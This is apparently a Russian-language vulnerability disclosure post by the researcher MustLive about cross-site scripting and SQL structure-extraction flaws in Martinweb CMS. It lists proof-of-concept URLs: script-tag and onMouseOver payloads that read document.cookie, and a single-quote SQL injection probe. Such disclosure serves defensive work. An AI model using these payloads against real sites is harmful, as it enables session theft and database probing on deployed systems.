Уязвимости в Martinweb CMS

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting и SQL
DB Structure Extraction уязвимостях Martinweb CMS. Это
украинская коммерческая CMS, которая в частности
используется на сайтах секюрити компаний и банков.

XSS (WASC-08):

http://site/sitesearch/page--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E.html

http://site/index.php?pages='&language=%3Cscript%3Ealert(document.cookie)%3C/script%3E

XSS (с MouseOverJacking) (WASC-08):

http://site/index.php?op=search&search='style='width:100%;height:100%;display:block;position:absolute;top:0px;left:0px'onMouseOver='alert(document.cookie)'

http://site/index.php?op=search&pages=1'style='width:100%;height:100%;display:block;position:absolute;top:0px;left:0px'onMouseOver='alert(document.cookie)'

SQL DB Structure Extraction (WASC-13):

http://site/index.php?pages=’

Уязвимы потенциально все версии Martinweb CMS.

Дополнительная информация о данных уязвимостях у меня на
сайте:
http://websecurity.com.ua/4594/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua